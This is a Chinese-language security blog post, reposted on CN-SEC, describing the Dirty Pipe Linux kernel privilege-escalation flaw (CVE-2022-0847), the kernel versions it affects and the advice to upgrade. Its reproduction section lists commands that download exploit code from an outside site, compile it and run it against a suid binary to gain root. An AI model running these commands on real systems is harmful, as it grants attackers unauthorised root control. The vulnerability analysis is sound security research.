CVE-2022-0847 Dirty Pipe linux提权漏洞分析与复现

2022年4月7日16:04:31评论10 views字数 546阅读1分49秒阅读模式

漏洞概述

CVE-2022-0847（Dirty Pipe）是存在于 Linux内核 5.8 及之后版本中的本地提权漏洞。攻击者通过利用此漏洞，可覆盖重写任意可读文件中的数据，从而可将普通权限的用户提升到特权root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞（Dirty Cow），但它更容易被利用。

影响版本

Linux Kernel版本 >= 5.8

Linux Kernel版本 < 5.16.11 / 5.15.25 / 5.10.102

注：该漏洞已在 Linux 5.16.11、5.15.25 和 5.10.102 中修复。

漏洞复现

查看系统内核版本，大于等于5.8符合本次漏洞利用前提。

CVE-2022-0847 Dirty Pipe linux提权漏洞分析与复现

id     #确认当前用户id，确定为普通用户，需要权限提升wget  https://haxx.in/files/dirtypipez.c     #下载漏洞EXPgcc dirtypipez.c -o exp     #编译EXP./exp /usr/bin/chfn     #执行EXP，并指定具有suid权限的可执行文件，以/usr/bin/chfn为例id     #再次查看id，权限已提升至root

CVE-2022-0847 Dirty Pipe linux提权漏洞分析与复现

处置建议

尽快升级内核版本。

CVE-2022-0847 Dirty Pipe linux提权漏洞分析与复现

原文始发于微信公众号（第59号）：CVE-2022-0847 Dirty Pipe linux提权漏洞分析与复现

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2022年4月7日16:04:31
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
CVE-2022-0847 Dirty Pipe linux提权漏洞分析与复现http://cn-sec.com/archives/885192.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

CVE-2022-0847 Dirty Pipe linux提权漏洞分析与复现

逆天提权漏洞，CVE-2025-32463，嘎嘎好使，速来复现

【提权】CVE-2025-32463 超低难度Linux提权漏洞，速度修复

绿盟网络入侵防护系统users.json敏感信息泄露漏洞

IBM WebSphere 远程代码执行漏洞(CVE-2025-36038)

Optilink upgrade.php 命令执行漏洞

【安全风险通告】Linux本地提权漏洞利用链 (CVE-2025-6018、CVE-2025-6019)

Apache JSPWiki跨站请求伪造漏洞（CVE-2022-24947）

PostgreSQL JDBC Driver RCE

Jetty WEB-INF 敏感信息泄露漏洞(CVE-2021-28164 )检测与防御nCVE-2021-28164

CVE-2025-32462&CVE-2025-32463

发表评论

在线咨询

微信